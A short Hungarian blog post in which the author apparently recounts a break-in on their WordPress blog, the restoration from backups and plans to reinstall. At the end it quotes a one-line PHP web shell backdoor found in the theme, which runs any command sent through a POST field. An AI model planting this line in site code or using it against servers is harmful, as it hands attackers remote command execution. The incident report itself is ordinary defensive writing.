Betörés, hihi

Derék emberek sikeresen betörtek a blogra. Alighanem egy (vagy több) wordpress esetleg php hibát használtak ki, az access log alapján több helyről is.

Szerencsére egy kolléga hamar észre vette a nyomort és  a konténert is gyorsan vissza tudtam állítani, illetve amit lehetett, megfrissítettem. A mentések alapján nyolcadika és tizenötödike között került fel az első gonosz fájl, de hogy mi módon, az még kérdéses. Aztán feltettek még párat, amik egyébként ugyanazt tudják, nomeg más-más IP-ről jöttek, így gondolom teljesen más emberkék voltak. A szeparált rendszer nagy előnye, hogy most gyakorlatilag egy üres gépen nézhettek csak körbe.

Mindenesetre hamarosan egy friss wordpress kerül a régi helyére, egy új konténerbe, mert ez, a mostani már nem megbízható. Addig is figyelem, hátha rajtakapok valakit a sompolygáson.

Addig is találtam furákat. Pl. a használt témában egy ilyen sort:

if ($_POST[“lock”]) echo exec($_POST[“lock”]);

Ejnye-bejnye, az az exec nagyon nem jó ott 😀

You may also like...